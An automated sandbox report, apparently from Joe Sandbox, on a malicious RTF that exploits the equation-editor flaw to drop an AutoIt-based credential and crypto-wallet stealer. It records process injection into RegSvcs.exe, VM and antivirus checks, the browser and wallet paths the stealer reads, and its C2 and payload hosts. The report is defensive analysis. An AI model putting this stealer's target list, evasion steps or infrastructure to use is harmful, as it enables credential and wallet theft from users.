                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe API/Special instruction interceptor: Address: 103224
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 6248
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_5-102383
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe API coverage: 4.7 %
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2952 Thread sleep time: -300000s >= -30000s
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3320 Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008EC93C FindFirstFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-999
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-1021
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-1006
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-1102
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-1063
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-1083
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe API call chain: ExitProcess graph end node graph_5-99593
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe API call chain: ExitProcess graph end node graph_5-99802
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe API call chain: ExitProcess graph end node graph_5-99913
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_001AABA1 LdrInitializeThunk
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008F41FD BlockInput
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008B5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_0099F090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005AC246 mov edx, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00103490 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_001034F0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00101E70 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008AA364 SetUnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008D8C93 LogonUserW
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008E4EC9 mouse_event
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: notorious53209.exe Binary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008A886B cpuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008C2230 GetUserNameW
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: p5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: notorious53209.exe Binary or memory string: WIN_81
                    Source: notorious53209.exe Binary or memory string: WIN_XP
                    Source: notorious53209.exe Binary or memory string: WIN_XPe
                    Source: notorious53209.exe Binary or memory string: WIN_VISTA
                    Source: notorious53209.exe Binary or memory string: WIN_7
                    Source: notorious53209.exe Binary or memory string: WIN_8
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match, File source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match, File source: dump.pcap, type: PCAP
                    Source: Yara match, File source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008F6596 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe Code function: 5_2_008F6A5A socket, WSAGetLastError, bind, WSAGetLastError, closesocket
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information2
                    Scripting
                    2
                    Valid Accounts
                    221
                    Windows Management Instrumentation
                    2
                    Scripting
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    13
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts33
                    Exploitation for Client Execution
                    2
                    Valid Accounts
                    2
                    Valid Accounts
                    21
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin Shares21
                    Input Capture
                    11
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Windows Service
                    21
                    Access Token Manipulation
                    1
                    Software Packing
                    NTDS228
                    System Information Discovery
                    Distributed Component Object Model3
                    Clipboard Data
                    3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Windows Service
                    1
                    DLL Side-Loading
                    LSA Secrets45
                    Security Software Discovery
                    SSHKeylogging114
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
                    Process Injection
                    1
                    Masquerading
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection
                    Network Sniffing1
                    Remote System Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Behavior Graph ID: 1461862, Sample: 2MbHBiqXH2.rtf, Startdate: 24/06/2024, Architecture: WINDOWS, Score: 100
                    • Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 16 other signatures
                    • WINWORD.EXE 291 18, started
                      • EQNEDT32.EXE 11, started; a second EQNEDT32.EXE, started
                        • DNS/IP: universalmovies.top 172.67.162.95, 443, 49162 CLOUDFLARENETUS United States
                        • Dropped: C:\Users\user\AppData\...\notorious53209.exe, PE32; C:\Users\user\AppData\...xtExport2[1].exe, PE32
                        • Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                        • notorious53209.exe 4, started
                          • Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Found many strings related to Crypto-Wallets (likely being stolen); 3 other signatures
                          • RegSvcs.exe 13 34, started
                            • DNS/IP: 185.38.142.10, 49163, 49165, 7474 NETSOLUTIONSNL Portugal; api.ip.sb
                            • Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 2 other signatures

                    Source | Detection | Scanner | Label | Link
                    2MbHBiqXH2.rtf | 37% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe | 50% | ReversingLabs | Win32.Trojan.Strab |
                    C:\Users\user\AppData\Roaming\notorious53209.exe | 50% | ReversingLabs | Win32.Trojan.Strab |
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    universalmovies.top | 172.67.162.95 | true | true | | unknown
                    api.ip.sb | unknown | unknown | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    185.38.142.10:7474 | true | Avira URL Cloud: safe | unknown
                    http://185.38.142.10:7474/ | true | Avira URL Cloud: safe | unknown
                        • Avira URL Cloud: safe
                        unknown
                        https://universalmovies.top/EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://universalmovies.top/(EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.RegSvcs.exetrue
                        • Avira URL Cloud: safe
                        unknown
                        https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
